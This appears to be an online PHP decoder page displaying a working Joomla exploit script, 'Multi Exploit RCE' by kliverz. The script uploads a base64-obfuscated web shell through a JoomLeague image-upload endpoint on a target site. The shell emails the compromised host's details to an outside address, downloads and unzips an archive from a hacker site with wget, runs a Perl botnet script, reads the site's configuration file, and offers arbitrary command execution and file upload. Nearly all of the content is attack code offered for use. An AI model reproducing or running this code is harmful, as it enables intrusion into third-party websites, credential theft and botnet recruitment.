Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php //Coded by kliverz //Multi Exploit RCE //Contact [email protected] $site = $..

Decoded Output download

Multi Exploit RCE by Kliverz</br></br><form method='get'><br/>URL target : 
<input type='text' name='kliverz' value='None'><input type='submit' value='HAJAR'></form>

Did this file decode correctly?

Original Code

<?php
//Coded by kliverz
//Multi Exploit RCE
//Contact [email protected]

$site = $_GET['url'];

echo "Multi Exploit RCE by Kliverz</br></br>";
echo "<form method='get'><br/>URL target :
<input type='text' name='kliverz' value='".$_GET['kliverz']."'><input type='submit' value='HAJAR'></form>";

$data = "<?php eval(base64_decode('aWYoIWlzc2V0KCRfU0VTU0lPTlsnYmFqYWsnXSkpew0KJHZpc2l0Y291bnQgPSAwOw0KJHdlYiA9ICRfU0VSVkVSWyJIVFRQX0hPU1QiXTsNCiRpbmogPSAkX1NFUlZFUlsiUkVRVUVTVF9VUkkiXTsNCiRib2R5ID0gImFkYSB5YW5nIGluamVjdCBcbiR3ZWIkaW5qIjsNCiRzYWZlbTBkZSA9IEBpbmlfZ2V0KCdzYWZlX21vZGUnKTsNCmlmICghJHNhZmVtMGRlKSB7JHNlY3VyaXR5PSAiU0FGRV9NT0RFID0gT0ZGIjt9DQplbHNlIHskc2VjdXJpdHk9ICJTQUZFX01PREUgPSBPTiI7fTsNCiRzZXJwZXI9Z2V0aG9zdGJ5bmFtZSgkX1NFUlZFUlsnU0VSVkVSX0FERFInXSk7DQokaW5qZWt0b3IgPSBnZXRob3N0YnluYW1lKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKTsNCm1haWwoInRyaWtsb3ZlckBnbWFpbC5jb20iLCAiJGJvZHkiLCJIYXNpbCBCYWpha2FuIGh0dHA6Ly8kd2ViJGlualxuJHNlY3VyaXR5XG5JUCBTZXJ2ZXIgPSAkc2VycGVyXG4gSVAgSW5qZWN0b3I9ICRpbmpla3RvciIpOw0KJF9TRVNTSU9OWydiYWphayddID0gMDsNCn0NCmVsc2UgeyRfU0VTU0lPTlsnYmFqYWsnXSsrO307DQoNCmlmKGlzc2V0KCRfR0VUWydrbGl2ZXJ6J10pKXsNCnN5c3RlbSgid2dldCBodHRwOi8vd2FwaGFja2VyLm5ldC9mb3J1bS9maWxlcy9jb21wb25lbnRzLnppcDt1bnppcCBjb21wb25lbnRzLnppcCIpOw0KfQ0KaWYoaXNzZXQoJF9HRVRbJ2RlbGV0ZSddKSl7DQpzeXN0ZW0oInJtIGNvbXBvbmVudHMuemlwIik7DQp9DQppZihpc3NldCgkX0dFVFsnYm90bmV0J10pKXsNCnN5c3RlbSgiY2QgY29tcG9uZW50cztwZXJsIGJ0LnR4dCIpOw0KfQ0KJHNhZmVtMGRlID0gQGluaV9nZXQoJ3NhZmVfbW9kZScpOw0KaWYgKCEkc2FmZW0wZGUpIHskc2VjdXJpdHk9ICJTQUZFX01PREUgOiBPRkYiO30NCmVsc2UgeyRzZWN1cml0eT0gIlNBRkVfTU9ERSA6IE9OIjt9DQplY2hvICI8dGl0bGU+SW5kcmFtYXl1IEN5QmVyPC90aXRsZT48YnI+IjsNCmVjaG8gIjxmb250IHNpemU9MiBjb2xvcj0jODg4ODg4PjxiPiIuJHNlY3VyaXR5LiI8L2I+PGJyPiI7DQokY3VyX3VzZXI9IigiLmdldF9jdXJyZW50X3VzZXIoKS4iKSI7DQplY2hvICI8Zm9udCBzaXplPTIgY29sb3I9Izg4ODg4OD48Yj5Vc2VyIDogdWlkPSIuZ2V0bXl1aWQoKS4kY3VyX3VzZXIuIiBnaWQ9Ii5nZXRteWdpZCgpLiRjdXJfdXNlci4iPC9iPjxicj4iOw0KZWNobyAiPGZvbnQgc2l6ZT0yIGNvbG9yPSM4ODg4ODg+PGI+VW5hbWUgOiAiLnBocF91bmFtZSgpLiI8L2I+PGJyPiI7DQpmdW5jdGlvbiBwd2QoKSB7DQokY3dkID0gZ2V0Y3dkKCk7DQppZigkdT1zdHJycG9zKCRjd2QsJy8nKSl7DQppZigkdSE9c3RybGVuKCRjd2QpLTEpew0KcmV0dXJuICRjd2QuJy8nO30NCmVsc2V7cmV0dXJuICRjd2Q7fTsNCn0NCmVsc2VpZigkdT1zdHJycG9zKCRjd2QsJ1xcJykpew0KaWYoJHUhPXN0cmxlbigkY3dkKS0xKXsNCnJldHVybiAkY3dkLidcXCc7fQ0KZWxzZXtyZXR1cm4gJGN3ZDt9Ow0KfTsNCn0NCmVjaG8gJzxmb3JtIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIiPjxmb250IHNpemU9MiBjb2xvcj0jODg4ODg4PjxiPkNvbW1hbmQ8L2I+PGJyPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjbWQiPjxpbnB1dCB0eXBlPSJTdWJtaXQiIG5hbWU9ImNvbW1hbmQiIHZhbHVlPSJjb2siPjwvZm9ybT4nOw0KZWNobyAnPGZvcm0gZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgYWN0aW9uIG1ldGhvZD1QT1NUPjxmb250IHNpemU9MiBjb2xvcj0jODg4ODg4PjxiPlVwbG9hZCBGaWxlPC9iPjwvZm9udD48YnI+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9InN1Ym1pdCI+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPSJ1c2VyZmlsZSIgc2l6ZT0yOD48YnI+PGZvbnQgc2l6ZT0yIGNvbG9yPSM4ODg4ODg+PGI+TmV3IG5hbWU6IDwvYj48L2ZvbnQ+PGlucHV0IHR5cGU9dGV4dCBzaXplPTE1IG5hbWU9Im5ld25hbWUiIGNsYXNzPXRhPjxpbnB1dCB0eXBlPXN1Ym1pdCBjbGFzcz0iYnQiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOw0KaWYoaXNzZXQoJF9QT1NUWydzdWJtaXQnXSkpew0KJHVwbG9hZGRpciA9IHB3ZCgpOw0KaWYoISRuYW1lPSRfUE9TVFsnbmV3bmFtZSddKXskbmFtZSA9ICRfRklMRVNbJ3VzZXJmaWxlJ11bJ25hbWUnXTt9Ow0KbW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbJ3VzZXJmaWxlJ11bJ3RtcF9uYW1lJ10sICR1cGxvYWRkaXIuJG5hbWUpOw0KaWYobW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbJ3VzZXJmaWxlJ11bJ3RtcF9uYW1lJ10sICR1cGxvYWRkaXIuJG5hbWUpKXsNCmVjaG8gIlVwbG9hZCBGYWlsZWQiOw0KfSBlbHNlIHsgZWNobyAiVXBsb2FkIFN1Y2Nlc3MgdG8gIi4kdXBsb2FkZGlyLiRuYW1lLiIgOlAgIjsgfQ0KfQ0KaWYoaXNzZXQoJF9QT1NUWydjb21tYW5kJ10pKXsNCiRjbWQgPSAkX1BPU1RbJ2NtZCddOw0KZWNobyAiPHByZT48Zm9udCBzaXplPTMgY29sb3I9IzAwMDAwMD4iLnNoZWxsX2V4ZWMoJGNtZCkuIjwvZm9udD48L3ByZT4iOw0KfQ0KZWxzZWlmKGlzc2V0KCRfR0VUWydjbWQnXSkpew0KJGNvbWQgPSAkX0dFVFsnY21kJ107DQplY2hvICI8cHJlPjxmb250IHNpemU9MyBjb2xvcj0jMDAwMDAwPiIuc2hlbGxfZXhlYygkY29tZCkuIjwvZm9udD48L3ByZT4iOw0KfQ0KZWxzZWlmKGlzc2V0KCRfR0VUWydyZiddKSl7DQokcmYgPSBmaWxlX2dldF9jb250ZW50cygiLi4vLi4vLi4vLi4vLi4vY29uZmlndXJhdGlvbi5waHAiKTsNCmVjaG8gJHJmOw0KfQ0KZWxzZSB7IGVjaG8gIjxwcmU+PGZvbnQgc2l6ZT0zIGNvbG9yPSMwMDAwMDA+Ii5zaGVsbF9leGVjKCdscyAtbGEnKS4iPC9mb250PjwvcHJlPiI7DQp9DQo=')); ?>";

$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','Content-Type: text/plain');

$handle = curl_init();
if(!empty($_GET['kliverz']))
{
$url = "http://".$site."/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php?name=kliverz.php";

$shell = "http://".$site."/components/com_joomleague/assets/classes/tmp-upload-images/kliverz.php";

curl_setopt($handle,CURLOPT_URL,$url);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);

$source = curl_exec($handle);
curl_close($handle);

if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r'))
{
echo "sukses bos kliverz";
echo $shell;
}
else
{
echo "gagal bos";
}
exit;
}

?>

Function Calls

curl_init

Variables

$data	<?php eval(base64_decode('aWYoIWlzc2V0KCRfU0VTU0lPTlsnYmFqYW..
$site	None
$headers	[{'key': 0, 'value': 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1'}, {'key': 1, 'value': 'Content-Type: text/plain'}]

Stats

MD5	78703598e5a577708c189855ec5ab2a0
Eval Count	0
Decode Time	105 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats